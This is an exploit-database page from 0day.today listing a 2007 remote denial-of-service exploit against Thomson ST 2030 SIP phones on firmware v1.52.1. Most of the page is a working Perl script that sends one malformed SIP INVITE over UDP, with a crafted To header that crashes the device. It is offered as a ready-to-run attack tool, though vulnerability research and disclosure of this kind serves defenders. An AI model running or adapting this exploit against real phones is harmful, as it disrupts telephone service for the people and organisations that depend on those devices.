[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Thomson SIP phone ST 2030 Remote Denial of Service Exploit

Author
MADYNES
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6441
Category
dos / poc
Date add
26-08-2007
Platform
hardware
==========================================================
Thomson SIP phone ST 2030 Remote Denial of Service Exploit
==========================================================



#!/usr/bin/perl

#Vulneravility for Thomson 2030 firmware v1.52.1

#It provokes a DoS in the device.

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);
 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: <sip:tucu\@192.168.1.2>;tag=00\r\nTo: <A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";

$socket->send($msg);



#  0day.today [2024-11-15]  #